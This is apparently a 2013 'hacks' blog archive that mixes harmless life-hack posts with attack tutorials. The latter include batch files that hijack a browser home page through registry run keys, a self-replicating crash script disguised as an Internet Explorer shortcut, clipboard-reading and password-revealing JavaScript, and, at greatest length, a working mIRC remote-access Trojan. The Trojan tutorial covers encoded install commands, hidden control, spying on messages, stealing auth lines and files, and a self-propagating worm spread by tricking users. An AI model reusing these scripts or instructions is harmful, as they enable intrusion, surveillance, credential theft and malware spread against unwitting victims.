Sunday, June 30, 2013

The bicycle tree

Although text is commonly associated with pictures of the tree claiming that the bicycle was left chained to it by a boy who went off to war in 1914, the bike is not nearly that old, nor was it left behind by a young man setting off to take part in World War I. According to the Vashon-Maury Island Beachcomber, the bicycle was left behind in the mid-1950s by a local resident who simply abandoned it:
Tales abound explaining how a red bicycle came to be lodged in a Vashon tree a dozen feet up.

Some say it ended up there by chance, while others contend in was intentional cleverness. One former Islander, Berkeley Breathed, even wrote a children's book about the mystery.

But one longtime Island family had laid a solid claim to the bicycle in a tree just north of Sound Food. Two generations concur that the bicycle belonged to Don Puz, who in 1954 left his bicycle in the woods, forgot about it and never went back looking for it.

Don received the bicycle as a donation after the family home burnt down, he said.

The bicycle wasn't his favorite — it had hard, solid rubber tires "and skinny little handlebars like a tricycle," he said. "I was too big a kid to ride it."

As his mother Helen Puz tells the story, Don and his friends were playing in the woods together, and Don was the only child who had ridden his bicycle there. When the boys left, Don left his bike behind, walking home with the other boys.

"Apparently, he wasn't too excited about that bike," she said.

After the bike was discovered, making headlines, both mother and son paid it a visit.

"We went down there in the woods, and there was this bike in the tree, and I said, 'That's my bike,'" Don recalled. "I recognized it immediately. When I saw that bike, I recognized it, because I don't think I've ever seen another one like it." Don Puz said nothing about leaving his bicycle chained to a tree, so given the current position of the bike within the tree, most likely one or more persons had a hand in moving it after Don abandoned it back in 1954.

Suspended tap

This image is not photoshoped.

If you are thinking how it's possible for the water tap to be suspended and in flow in the air without the source? Here's the truth: it isn’t. There is infact a pipe going through the water flowing down which is holding the 'Tap' in the air and also the source of water.

Wednesday, June 26, 2013

Mouse jam!

Mouse jam with a sticky note... How about it? ;)

3D pencil sketch

3D effect by using 3 sheets of paper.

The cell charging hub

Rigged up with a generator... battery low? Charge them all together. These cell charging shops have developed as a result of loadshedding (rolling blackouts) from the power shortage.

Friday, June 21, 2013

How to Setup Email Reminders Using Email

If you want to check back on something later and you don't have the time to set up complex reminder programs - you can simply setup email reminders in Gmail or other mail programs. All you have to do is send an email to the appropriate FollowUpThen email address.

I do it all the time... especially when I am using a mobile phone. If I come across a cool site that I would want to check out later from the desktop or if I just want to dump a hack into my email ID to read on it later, I just send the URL to my own email account. If I have an idea for a blog or if I just need to remind myself of somethign, I jot it down in a message and email or SMS it to myself.

There are many apps that you can use to schedule email based reminders, including Google Calendar or even scripts inside google docs, but if you prefer to have something really simple that you can use from your inbox without any setup, check out FollowUpThen.

This service allows you to quickly setup custom email reminders using email. All you have to do is send a message to and the service will send you a copy of the same email message after the time interval you specified.

Check out some sample date formats examples that you may want to use while setting up email reminders: (to get a reminder at 6 PM exact) (to get a reminder at 6 PM tomorrow) (to get a reminder after 10 minutes) (to remind me after 3 days) (to remind me the next Tuesday) (to setup email reminders for a specific date)

Their service recognizes time zones from your email headers so if you setup a reminder for 1 PM, you will be reminded as per your own time zone. This means you wont have to specify if you are +5 GMT (for PST) as far as your email has the right country set in it. You can also setup recurring email reminders with FollowUpThen although an online calendar like Google's is better for tasks like that.

Tuesday, June 18, 2013

Hackers' IQ Test

If you think you are good at Hacking or Juggaars, here's an IQ test for you. There are 17 hidden pages in this website. I'll be giving you only the link to the first page on this website which will not be linked to any other page. Work your way through the links on the address bar and see if you can reach upto the seventeenth page. You'll be given hints as you reach the next page. You don't get to have the hint for the first one though - it's too obvious ;)

Here's the first:

Hint 1: edit the above address to navigate ahead ;)

You'll have to think intuitively and reiterate differently each time you find the next page.

Good luck.

PS. comments have been disabled in the hidden pages. Leave any comments on this page or the facebook page. Don't leave hints in the comments though... or I'll have no choice but to delete them.

Monday, June 17, 2013

Fan rigged up on bike

After rigging up your bike post, here is a new bike rig for summers.

Hijacking Inernet Explorer home page

It is usefull if you have your own fake web page and wann to fix public place or your friends internet explorer home page or if you just want to

Make there .bat files
  1. homepage.bat
  2. hijack.bat
  3. call.bat
code for homepage.bat file

reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d "" /f

code for hijack.bat

reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Homepage" /d "C:\WINDOWS\homepage.exe" /f

code for call.bat

copy homepage.exe C:\WINDOWS\homepage.exe

call C:\WINDOWS\homepage.exe

call hijack.exe

Now download Bat_To_Exe_Converter v1.5 from google in free and size 420 kb (or another converter) and convert call.bat to call.exe and include your 1.homepage.bat 2.hijack.bat

Now your call.exe is a small exe program that set internet explorer home to your fake page each time when computer is started.

Friday, June 14, 2013

Clipboard hacking

Clipboard is a cross application gadget that operating systems use to give you a quick copy and paste tool which can cross over content from application to application. But keeping sensitive content in clipboard is not safe. Here is one reason you might not want to save your passwords, pin codes, account numbers etc in your clip board (copy pasting or otherwise) while surfing the internet.

This is a simple script that will enable a website to get whatever was saved in your clipboard:

<Script Language="JavaScript">
var content = clipboardData.getData("Text");

This site explains how, once collected, it can be forwarded and used.

Thursday, June 13, 2013

Solar cap

Good way to save energy and make it portable at the same time...

Turn notepad into logbook

I use notepad as one in all application to store text or some times even to remove formatting from my text by copying to notepad and then to the target from there. Here's another quick use of notepad. If you want to use it as a log book with time stamps:
  1. Create a new notepad file,
  2. Type .LOG in the first line,
  3. Press enter,
  4. Save the file and close.
Now whenever you edit the file, the notepad will append time stamps to the end of file. Try typing  your notes, saving and then re-editing.

Creating a Warning Dialog at Welcome in Windows XP

WARNING: If you use Registry Editor incorrectly, you may cause serious problems that may require you to reinstall your operating system.

To enable display of a warning message, make the following changes in the registry: 1. Start Registry Editor (Regedit).

2. Locate the HKEY_LOCAL_MACHINE subtree, and then go to the following key:

SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon

3. Add or modify the following values:

Name Data Type Value

LegalNoticeCaption REG_SZ Dialog Caption

LegalNoticeText REG_SZ Dialog Message

For example, the "LegalNoticeCaption" can be "Important Notice:" and the "LegalNoticeText" can be "No unauthorized access is allowed".

The user sees this dialog box after the user presses CTRL+ALT+DEL and before the user sees the logon dialog box. The user can click OK in the message box and log on normally. Quit Registry Editor.

Tuesday, June 11, 2013

Hacky traditions?

You know it's a true Juggaar culture when it starts blending into the daily life and food.

Sending all files in a folder over SMTP

A while ago I was looking for how to back up all the data in my hard disk on email ID. I could have attached all files in emails (multiple files in a single mail with explanation in body) but that would be too hectic and only reasonable for a selective dump. If I wanted to upload, for example, all my music... I needed something automated.

Command line has always been easier to be included in hacks and codes to get your work done with elegance. I searched for an command line email program (as a replacement for a normal GUI email program) and used my university server to upload it all.

Now all I had to do was create a .bat file and place it in the same folder with all my files in it and executing it would do the rest. I chose Febooti Mail - a trial version still did the trick (even though it had a signature saying it was a trial version at the end of each mail... but who cares).

This is the .bat code I wrote for it:

@echo on

rem sending all files in the folder as attachments. one attachment per email...

for %%i in (*.*) do Febootimail -smtp -to -from -debug -subject %%i -ATTACH %%i

This was elegant, each mail had one attachment with it and the file name as the subject. Much easier to search through my personal backup using gmail search. Now that I was receiving all my files at gmail, I had to set up a simple filter to tag it with a label and 'archive' it so that my inbox was not flooded.

A romantic code

It started off with looking to play pranks in an assignment solution. A friend was making for some junior that happened to be a chick!!

The idea: To open up my heart to the chick, every time she boots up Windows :D

The idea was to put a batch file in the Windows start-up folder!!

But the output from a batch file looked so remotely romantic, I decided to put an executable instead! Every line in this code soo pours out my emotions! (PS. don't take it seriously)


using namespace std;
void fn() {
ofstream fp(”143.c”,ios::app);
fp << “#include\n#include\nint main()\n{printf(\”Oh dear! just hit on me and I ll make you feel like a woman does!! :D @090078601\”);\ngetch();\nreturn 0;}\n”;
system(”C:\\Dev-Cpp\\bin\\g++.exe 143.c”);
system(”move a.exe \”C:/Documents and Settings/All Users/Start Menu/Programs/Startup/143.exe\”");
system(”erase 143.c”);
int main() {
return 0;

Copyrights: Your are free to copy and distribute the code! Just don’t edit the phone number:D

Picking a real lock

An excerpt from Secrets of Lock Picking by Steven Hampton:

Monday, June 10, 2013

Trivial but nasty: how to create the smallest of Trojans

Here's how to create the smallest of the Trojans to crash a PC:

Open a notepad,

Type the text below:

start crash.bat

Save the file as crash.bat
Create its shortcut and change icon & shortcut name to, for example, "Internet explorer" ;)
The one who opens the file will crash his system.

If you want to change the name of the original file, you will also have to change the name (crash) being called inside the file.

Here is what the Trojan does when executed. It runs the command again itself and opens another instance of the same file multiplying the running instances into 2. Now both these files will do the same (separately) with no end to it, hence multiplying and hogging up the ram till the system crashes. Try closing them before they have multiplied too much... ;) you will most probably still not be able to shut them all down by playing whack a mole with your mouse and the x button on the windows (if you realize what's happening in time that is).

Happy Crashings.

How the USB AutoRun virus works

If you have been frustrated by this one, you might also be interested in how it works so I'm sharing it here...

This file virus is a Windows PE EXE file. The file is 380 416 bytes in size. It is written in Delphi.

When launched, the virus copies its executable file as follows:


It also creates the following file:


When this file is run, it will launch a copy of the virus:


In order to ensure that the virus is launched automatically when the system is rebooted, it adds a link to its executable file to the system registry:

"Worms" = "%System%\logon.bat"

The virus also creates the following files:


These files will be launched each time the user opens the corresponding hard disk partition using Windows Explorer. When one of these files is run, it will launch a copy of the virus: %System%\config\csrss.exe.


The virus modifies values of the following system registry keys:


DisableTaskMgr = 1


NoFolderOptions = 1

It also searches the hard disk partitions listed below for files with an ".mp3" extension:


These files will then be deleted.

Sunday, June 9, 2013

Websites that give hacking missions

If you want to learn intrusion techniques for pentesting, these are a few sites that teach you by giving you tasks that involve hacking onsite pages:

(for different exploits)

Convert password asterisks to text

Running this java script in your browser address bar would convert the "asterisks" entered into a password field back into text and reveal the entered password (if you forgot or if some one left it in the input box without pressing enter):

javascript:(function(){var s,F,j,f,i; s = ""; F = document.forms; for(j=0; j<F.length; ++j) { f = F[j]; for (i=0; i<f.length; ++i) { if (f[i].type.toLowerCase() == "password") s += f[i].value + "\n"; } } if (s) alert("Passwords in forms on this page:\n\n" + s); else alert("There are no passwords in forms on this page.");})();

Invisible Folders

Here's a simple and obvious trick to make your folder apparently invisible:

1) Right click on the desktop. Make a new folder.
2) Rename the folder to a space (hold ALT key and type 0160).
3) Now u have a folder with "space" character as its name.
4) Right click on the folder > properties > customize. Click on change icon.
5) Scroll a bit, u should find some empty spaces (blank icons), click on any one of them. Click ok.

Your folder will be there, you will be able to select it and the contents will appear in search results too.. but hidden from the naked eye.

Embedding the logout link

There this one trick I used to do back in orkut times when they enabled html etc. I guess you might want to try it with other services by modifying the link. Embed the logout link into the message and when it loads, the reader will be logged out. Nusiance:

<embed src="" width="1" height="1">

Thursday, June 6, 2013

Creating an IRC Trojan

It's possible to obtain remote control over another mIRC Client when using the script that will be explained here. You can however also test this on one client. However the best use is to remotely control your bot on another computer (PC) over the internet or over a network. This will give you the ability to do every command you want. This tutorial is written for a layman, so you don't need to actually understand IRC script, it's easy to understand and easy to use. No real pre-knowledge required. Of course this can be used abusively, however the author only supports the legal (educational) use. You can edit this code easily to let it propagate on your own network. Also look at the mIRC Self-Propagating Script given after the remote access script.

It is also possible to make complete bots with this script in a very easy way, without using other programming languages (C, VB, ...).

IRC Remote Access Script

Install on remote computer (Infect the victim)

The script can be activated by the remote PC when he writes the next command:

//write czm.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs czm.mrc | msg YOURNICK Hello World

YOURNICK = your nick. The remote computer will message you “Hello World” once he writes the command. You can edit it or just delete the “ | msg YOURNICK Hello World” part.

This is what the command does: it will make a new .mrc file czm and put this in it (which is encoded in the command): on ^*:text:ins*:?:{ . $+ $2- | haltdef }

The haltdef will block your messages to the remote PC beginning with “ins”. With this the user can’t see your commands, so he wont have a clue who is controlling his mIRC. You can naturally leave that part out of the command when you want to see the messages on the remote computer. However most of the times you don't want the remote computer to "read" all the messages, since they are irrelevant (in the bot case by example).


/msg bot ins msg #channel hi

This will let the bot message #channel the “hi” message, but the remote PC will NOT see it, all others in the channel will see. And the bot will not see your message “ins msg #channel hi” because it will be blocked by “haltdef”. Nice isn’t it? If this has a bot application in this way the bot doesn't get all the garbage data that it doesn't need.

When the bot has executed that command the remote script is active. You can add a spy function if you want (this can cause him an excess flood if he is on too much “popular” channels (channel with much activity or chatting). For adding the spy part (it will send you all his activity, messages received, message sent and commands executed) execute the next commands:

Spy the remote PC (e.g. logging the activities for bots)

/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:*: { .msg YOURNICK $timestamp <- < $+ $iif($chan,# $+ :,$+ ) $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc

Once done that, you’ll receive the msgs immediately. You can let the spy function stop by typing the next command:

/msg bot ins unload -rs myscript.mrc

Note: bot = the nick of the client who has executed that command, and who has the remote script activated RAT (aka Trojan).

Sometimes you want to partly spy the remote PC, by example only read the private messages. Not the messages from the channels he is in, with this you will have less chance that he will flood himself of the server (excess flood). So the spy script becomes:

/msg bot ins write -c myscript.mrc
/msg bot ins unload -rs myscript.mrc
/msg bot insert write -c myscript.mrc on *:CONNECT: { .msg YOURNICK i am online }
/msg bot ins write myscript.mrc on *:TEXT:*:?: { .msg YOURNICK $timestamp <- < $+ $nick $+ > $1- }
/msg bot ins write myscript.mrc on *:INPUT:*: { .msg YOURNICK $timestamp -> $iif($left($1,1) != /,< $+ $me $+ >,[COMMAND]) $1- }
/msg bot ins load -rs myscript.mrc

YOURNICK is your nick, and bot is the nick of the remote client.

Make other remote files (.mrc)

You can make remote files yourself and add usefull functions in it.

/msg bot insert write -c YOURSCRIPTNAME.mrc on 1:TEXT:*!opme*:#CHANNEL:/mode #channel +o $nick
/msg bot ins .load –rs YOURSCRIPTNAMEt.mrc

Use of the Trojan

/msg bot ins remove C:\Textfile.txt

/msg bot ins url

/msg bot ins join #channel

/msg bot ins part #channel

/msg bot ins query user

/msg bot ins msg user

/msg bot ins invite user #channel

/msg bot ins ban #channel user

/msg bot ins kick #channel user

/msg bot ins ignore *!*

/msg bot ins unignore *!*

/msg bot ins nick thenickyouwant

/msg bot ins mode #channel +o user

/msg bot ins mode #channel +v user

/msg bot ins topic #channel text

/msg bot ins dcc send user file
/msg bot ins dcc send user C:\something.sth

/msg bot ins write -l1 C:\TESTING.txt thetextyouwanttoedit
(-l1 --> first line)

following commands must be executed after eachother:
/msg bot ins write mab alias abcd123 { msg user $read(perform.ini,w,*auth*) }
/msg bot ins .load -rs mab
/msg bot ins abcd123

/msg bot ins write MAB1 alias MAB1 { .echo $findfile(C:\,porn.*,0,msg user $1-) }
/msg bot ins .load -rs MAB1
/msg bot ins MAB1

/msg bot ins write MAB2 alias MAB2 { while (1 != 2) { beep } }
/msg bot ins .load -rs MAB2
/msg bot ins MAB2

//echo $findfile(c:,*.*,0,write C:\M_A_B.txt $1-)

Note: Probably you want this file, well you do this:

/msg bot ins dcc send YOURNICK C:\M_A_B.txt

** Important note **

The bot will see the send dialog, so act quick, for security reasons i suggest to write another trojan on another file; like:

/msg bot write MyNewScript.mrc $decode(b24gXio6dGV4dDppbnMqOj86eyAuICQrICQyLSB8IGhhbHRkZWYgfQ==,m) | .load -rs MyNewScript.mrc

/msg bot ins ajinvite on

/msg bot ins amsg <the message you want him to say on all channels>

/msg bot ins anick <nickname>

/msg bot ins background [-aemsgdluhcfnrtpx] [window] [filename]
-a = active window
-m = main mIRC window
-s = status window
-g = finger window
-d = single message window
-e = set as default
-cfnrtp = center, fill, normal, stretch, tile, photo
-l = toolbar
-u = toolbar buttons
-h = switchbar
-x = no background picture

/msg bot ins channel #CHANNELNAME

Note: the bot must be on #CHANNELNAME

/msg bot ins clearall [-snqmtgu]
s = status, n = channel, q = query, m = message window, t = chat, g = finger, u = custom.

/msg bot ins clipboard <the text you want to be clipboarded>

/msg bot ins close

/msg bot ins quit <the quit message you want>

/msg bot ins disconnect

/msg bot ins server

/msg bot ins server -m
/msg bot ins server

LET THE BOT GIVE YOU FLAGS (if he is able to):
/msg bot ins msg |TheBot| chanlev #channel YOURNICK +flag
|TheBot| = the bot who can give flags
Chanlev = can be different, sometimes it is also, "adduser"
flag = the flag you want
YOURNICK = your nick

/msg bot ins font -asgbd <fontsize> <fontname>

/msg bot ins fullname <name>

/msg bot ins hop #CHANNEL

/msg bot ins mkdir <dirname>
bot = nick of the remote client
user = your nick

IRC Self-Propagating Script

In this tutorial I will try to show a method to make a self replicating script for mIRC. This tutorial is for educational use only, to explore how mIRC script works and how you can protect yourself against these threats. The author does not take any responsibility for the damages one can cause using this script. If you do not agree with these terms I suggest you stop reading this tutorial.

Tutorial mIRC Self-Propagating Script

First of all I need to notice you that this script is allows remote controlling the client. This means that people (eventually bots), that have this script running, can be controlled by you via IRC. It is possible for the script to propagate in a natural way.

Get Started

It all starts with the next command:

//write mab.mrc $decode(b24gXio6dGV4dDoqOio6IHsgaWYgK
ocigxMjQpIC5sb2FkIC1ycyB9IH0=,m) | .load -rs mab.mrc

This in one line!

Understanding the Script

We need to mix these two things:

The Self-Propagating Part

on 1:text:*a*:#:{ .ignore $nick | .timer 0 120 .join #mab | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R }

Here is #mab the channel you want to let them join if they've installed the script. But since that would not be very efficient in most cases, we can do it in another way. We let it message you. We change the .timer 0 120 .join #mab with .msg mab_ inf. Where mab_ is your nickname.

With this your self replicating and self propagating script has started, it will now try to spread the script, it will try to personal message some people saying 'itself', while ignoring people. Done that it will try to send itself to other users, and tell them to type the command.

Now we are going to change some things about it so the functionality of the control script is constructive. We will remove the user mode +R on the end of the script, because this will only let users who are authenticated with the official server bot message the script user. Once the script is implemented that is not the objective, so we will remove that from the script. So after this changes we get the next script that we have to merge with the remote control script:

on 1:text:*a*:#:{ .ignore $nick | .msg mab_ inf | .msg $nick Do you want to be an OPERATOR in $chan ? copy/paste this-> $chr(3) $+ 4//write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs }

The Remote Access (control) Part

on ^*:text:ins*:?:{ . $+ $2- | haltdef }

Mixed they will give us the self propagating remote control script. This means that the script will spread itself, join the certain channel (here: #mab) and after that it will spread itself, and next to that wait for you to control it remotely. So you will have the ability to obtain complete remote access to the client, using mIRC.

I will now try to give more details about that script. So you truly understand this script. In this way it can be easily modified. I will mix it.

So basically we want to mix these two “mechanisms”:

on 1:text:*a*:#:{ DO SOMETHING }
on ^*:text:ins*:?:{ DO SOMETHING ELSE | haltdef }


on ^*:text:*:*: {
if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING
elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE

In one line:

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) DO SOMETHING | elseif ((a* iswm $1-) && ($chan)) DO SOMETHING ELSE }

Where here is DO SOMETHING the remote control part's work and DO SOMETHING ELSE the self propagating part's work.

Integrated (Two parts joined together):

on ^*:text:*:*: { if ((ins* iswm $1-) && ($target == $me)) { . $+ $2- | haltdef } | elseif ((a* iswm $1-) && ($chan)) { .msg mab_ inf | .msg $nick Do you want to be OPERATOR in $ $+ chan ? copy/paste this-> 7 //write . $ $+ decode( $+ $encode($read($script,n,1),m) $+ ,m) $chr(124) .load -rs . $chr(124) //mode $ $+ me +R } }

Good this is exactly what we needed. Now this doesn’t look very good, so we need to encode it with mIRC. For this we have to write it firstly like something else, some chars have to be written differently because mIRC can misunderstand them and think they are parameters or other things. The next chars have to be written differently: (){},
Why these chars and how can I control it?

//echo -a $asc(char here)

If this gives a bad result this means that the char must be written in another way.

Example encoding of “,”:

//say $encode(,,m) This is wrong
//say $encode($+ $chr(44),m) This is correct


$+ = pasting two strings together

| = $chr(124)
, = $chr(44)
( = $chr(40)
) = $chr(41)
{ = $chr(123)
} = $chr(125)

Sometimes this method is not needed.

For finding the numbers you use this:

//echo -a $asc($?)

This will pop up an input box, just fill in the char and you’ll get the number as result.

It's possible to $encoding now, without bugs. So this is what we get before we start encoding:

on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125)


//say $encode(on ^*:text:*:*: $chr(123) if ((ins* iswm $ $+ 1-) && ($ $+ target == $ $+ me)) $chr(123) . $ $+ + $ $+ 2- $chr(124) haltdef $chr(125) $chr(124) elseif ((a* iswm $ $+ 1-) && ($chan)) $chr(123) .msg mab inf $chr(124) .msg $ $+ nick Want to be OPERATOR in $ $+ chan copy/paste this-> $chr(3) $+ 4//write . $ $ $+ + decode( $ $+ + $ $+ encode( $+ $ $+ read( $+ $ $+ script,n,1),m) $ $+ + ,m) $ $+ chr(124) .load -rs $chr(125) $chr(125),m)

For finding the $encoded variable we split it up as global variables. The variables are set with

/set %var STRING

So for finding it we write the next in mIRC:

//say $encode(%var1 $+ %var2 $+ %var3 $+ %var4,m)

But we don't necessarily need to set is as variables before we encode it. So you can just use the encode line. We find the next as result:


This is the encoded command in one line of code.

Wednesday, June 5, 2013

Automatic mowing?

Lazy people know the fastest way to do the job. - Bill Gates.

How to get back your stolen car in Pakistan?

A useful tip for car owners on how to Immediately Get Back Your Stolen Car in Pakistan.

It is a good idea for those who can't afford car insurance or Tracker System.

It takes hardly a minute for a car thief to getaway with your car even with a tracking system or automated alarm systems.

Hiding a live and active Mobile Phone in a safe place in your car is a hacky safety thieves don't usually look for:

1. Buy a low price mobile phone with a long standby time (a model of Q Mobile runs for 10 days on standby and cost around Rs.2,200/-).

2. Install a mobile connection which has best network in the country.

3. Set this mobile on SILENT mode with vibration off (double check it).

4. Wrap the cell up in a plastic sheet to keep it from getting dirty or dusty during its hidden use but do not wrap it in any shielding material that might prevent it's signal..

5. Double check that the cell number is responding by calling its number from another mobile phone / land line.

6. Hide this mobile in a safe place in your car (make sure you do not hide it near your car's speakers or radio so that the disruption signal from cell does not give away it's position). And that’s it…!

If your car gets stolen, immediately inform your local Police Help Line, 15 in Pakistan. Give them the phone number of the mobile hidden in your car. Police can easily track the location by calling that number. Chances are that you may get back your car within the shortest possible time.

Remember to charge this mobile at least twice a week and hide it back in your car in active position.

Monday, June 3, 2013

Apt job ad for engineers

In what might apparently be a satirical image, one might find this as a life hack which is one of the most apt ways of finding the right employees and avoiding the spam or even dull candidates at the same time. Though this one gives the concept with a simple  problem on the slip, the idea might be used to give out job ads in more complex and relevant problems. If it is posted on a serious job ads sight or directly on an employer outlet / website, I doubt any one would take an ad like this as a hoax.

If you fear change, leave it here...

An apt sign for charity jars at your shop. Suits well with the recent elections in Pakistan.